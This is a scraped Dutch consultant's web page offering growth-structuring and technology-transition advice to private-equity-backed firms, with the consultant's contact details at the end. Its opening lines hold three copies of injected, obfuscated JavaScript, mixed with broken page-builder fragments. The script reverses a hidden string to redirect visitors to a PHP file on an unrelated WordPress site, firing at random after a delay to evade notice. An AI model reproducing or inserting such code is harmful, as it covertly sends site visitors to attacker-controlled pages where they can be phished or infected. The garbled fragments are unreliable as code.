) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}top_left” background_repeat=”repeat” global_colors_info=”{}”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_padding=”|||” global_colors_info=”{}” custom_padding__hover=”|||”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}top_left” background_repeat=”repeat” global_colors_info=”{}”]

Structureren van groei

Private equity partijen willen meestal niet direct betrokken zijn bij het bestuur van hun participaties. Toch is er vaak specifieke expertise nodig en is het in alle hectiek goed dat de grote lijn in de gaten wordt gehouden. In zulke situaties kan ik rust in het proces brengen, effectief en evenwichtig. En in onzekere tijden een objectief en onafhankelijk klankbord zijn voor de diverse betrokkenen.

Elke groeifase brengt aparte vragen met zich mee. Om de goede dingen op het juiste moment te kunnen doen is een heldere visie op de groeistappen en een duidelijk proces noodzakelijk. Zelf werk ik o.a. met de Scaling-Up methode (gebaseerd op de Rockefeller principes), om actiegerichte energie zo effectief mogelijk in te kunnen zetten.

 

60 – 70 % van invoeren van nieuwe processen en technologie mislukt

Vaak ontbreekt het bij technologie implementaties aan kennis van en ervaring met digitale werkwijzen. Draagvlak ontbreekt omdat medewerkers niet overtuigd zijn van de noodzaak van de beoogde veranderingen. En als de bedoeling niet duidelijk is zal er weinig enthousiasme zijn om er extra de schouders onder te zetten. Mijn achtergrond in ICT geeft een stevige basis om in gewone taal de brug te leggen tussen de techniek en de behoefte van de gebruikers.

 

80 % van projectmanagers ziet geen relatie tussen projecten en strategie
Als niet helder is hoe een project bijdraagt aan de toekomst van de onderneming werkt dat demotiverend. Acties horen het bedrijf verder te helpen in de gewenste richting. Dan heeft iedereen het gevoel dat ze een zinvolle bijdrage leveren. Mijn kracht ligt in het verbinden van (ICT) technologie, business en mensen.

 

> Mijn rol bij transities

 

Ik maak graag een afspraak om hier verder over te praten

Hans-Peter Evers

M +31 622 791 109

E hanspeterevers@tanera.com
M +31 622 791 109

nl_NLNL